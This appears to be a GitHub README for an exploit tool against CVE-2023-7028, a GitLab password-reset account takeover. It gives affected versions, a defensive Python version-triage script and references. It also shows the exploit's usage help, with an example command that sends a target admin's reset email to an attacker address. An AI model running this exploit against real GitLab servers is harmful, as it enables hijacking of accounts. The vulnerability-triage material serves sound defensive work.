# CVE-2023-7028

โš ๏ธ This exploit is for defensive purposes and should be used by cybersecurity professionals to identify possible vulnerable GitLab servers.

# Description

### CVE-2023-7028 - Account Takeover via Password Reset without user interaction in GitLab Community Edition and Enterprise Edition

![gitlablogo](https://upload.wikimedia.org/wikipedia/commons/e/e1/GitLab_logo.svg)

*Products and Versions affected:*

| Product                           | Affected Versions                                        |
| :-------------------------------- | :------------------------------------------------------- |
| GitLab Community Edition and Enterprise Edition | < 16.1.6 <br /> < 16.2.9<br /> < 16.3.7 <br /> < 16.4.5 <br /> < 16.5.6 <br /> < 16.6.4 <br /> < 16.7.2 |

- **CVSS:** 10.0
- **Actively Exploited:** NO
- **Patch:** [YES](https://about.gitlab.com/releases/2024/01/11/critical-security-release-gitlab-16-7-2-released/)
- **Mitigation:** NO
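An added helper, not part of this repository's script, that checks a GitLab version string (as returned by an instance's `/api/v4/version` endpoint) against the affected ranges in the table above, so an inventory can be triaged without sending any password-reset requests. It assumes, as GitLab's release post under References states, that only the 16.1 to 16.7 branches carry the bug, so releases before 16.1 or from 16.8 onwards are reported as unaffected; the sample version list is constructed.

```python
import re

# First fixed release on each affected 16.x branch, taken from the table above.
FIXED_BY_BRANCH = {
    (16, 1): (16, 1, 6),
    (16, 2): (16, 2, 9),
    (16, 3): (16, 3, 7),
    (16, 4): (16, 4, 5),
    (16, 5): (16, 5, 6),
    (16, 6): (16, 6, 4),
    (16, 7): (16, 7, 2),
}

# MAJOR.MINOR.PATCH with an optional edition suffix such as "-ee" or "-ce".
VERSION_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)(?:-[\w.]+)?$")

def parse_version(text):
    """Return (major, minor, patch) for a GitLab version string."""
    match = VERSION_RE.match(text.strip())
    if not match:
        raise ValueError(f"unrecognised GitLab version: {text!r}")
    return tuple(int(part) for part in match.groups())

def is_vulnerable(text):
    """True when the version sits below the fix on one of the affected branches.

    Assumption: releases outside the 16.1 to 16.7 branches (older 15.x, or
    16.8 and later) are not affected, matching the branches listed above.
    """
    major, minor, patch = parse_version(text)
    fixed = FIXED_BY_BRANCH.get((major, minor))
    return fixed is not None and (major, minor, patch) < fixed

def triage(versions):
    """Label each version 'vulnerable', 'patched' or 'unaffected'."""
    labels = {}
    for version in versions:
        if is_vulnerable(version):
            labels[version] = "vulnerable"
        elif parse_version(version)[:2] in FIXED_BY_BRANCH:
            labels[version] = "patched"
        else:
            labels[version] = "unaffected"
    return labels

if __name__ == "__main__":
    # Constructed sample inventory, e.g. gathered from each instance's /api/v4/version.
    for version, label in triage(["16.7.1-ee", "16.7.2", "16.1.5", "16.8.0", "15.11.0"]).items():
        print(f"{version:>10}  {label}")
```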

# Help

```
usage: CVE-2023-7028.py [-h] -u URL -t TARGET -a ATTACKER

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     GitLab URL (HTTP or HTTPS)
  -t TARGET, --target TARGET
                        Target email address
  -a ATTACKER, --attacker ATTACKER
                        Attacker email address
```

**Example:** `python CVE-2023-7028.py -u https://gitlab.example.com -t admin@example.com -a attacker@notexample.com`

# Lab

You can use the TryHackMe room [GitLab CVE-2023-7028](https://tryhackme.com/room/gitlabcve20237028) to test the exploit, since it runs a GitLab version affected by CVE-2023-7028.

# Shadowserver View of GitLab Servers

![map2](https://github.com/yoryio/CVE-2023-7028/assets/134471901/6140f105-bee0-4bee-b07c-2003c1f0d9a7)

# References

- [GitLab Critical Security Release: 16.7.2, 16.6.4, 16.5.6](https://about.gitlab.com/releases/2024/01/11/critical-security-release-gitlab-16-7-2-released/)
- [Over 5,300 GitLab servers exposed to zero-click account takeover attacks](https://www.bleepingcomputer.com/news/security/over-5-300-gitlab-servers-exposed-to-zero-click-account-takeover-attacks/)
- [Shadowserver GitLab Statistics](https://dashboard.shadowserver.org/statistics/combined/map/?map_type=std&day=2024-01-23&source=http_vulnerable&source=http_vulnerable6&tag=cve-2023-7028%2B&geo=all&data_set=count&scale=log)
- [CVE-2023-7028 - AttackerKB](https://attackerkb.com/topics/VBDvNxhyjr/cve-2023-7028)